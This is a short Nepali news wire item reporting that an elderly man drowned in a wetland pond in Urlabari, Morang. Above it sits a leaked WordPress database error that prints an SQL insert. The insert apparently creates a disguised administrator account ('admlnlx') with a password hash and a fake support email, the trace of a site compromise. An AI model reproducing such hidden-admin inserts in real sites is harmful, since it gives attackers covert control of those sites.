WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BR3lVRMmyP0sE.z2Jksy4ifhDfWmAb/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 15:37:51', '', 'admlnlx', 'admlnlx')
उर्लाबारी (मोरङ),माघ २६ –
मोरङको उर्लाबारी–७ स्थित बेतेनी सिमसारमा डुबेर आज दिउँसो एक वृद्धको मृत्यु भएको छ ।
मादक पदार्थ सेवन गरेर सिमसारको पोखरीमा पौडी खेल्न पसेका उर्लाबारी–७ कै ६३ वर्षीय वृद्ध रत्नबहादुर भण्डारीको मृत्यु भएको हो ।
मृतक भण्डारीको शव परीक्षणका लागि उर्लाबारीस्थित मङ्गलबारे अस्पतालमा राखिएको इलाका प्रहरी कार्यालय उर्लाबारीका प्रहरी निरीक्षक चन्द्रबहादुर थापाले जानकारी दिनुभयो । – रासस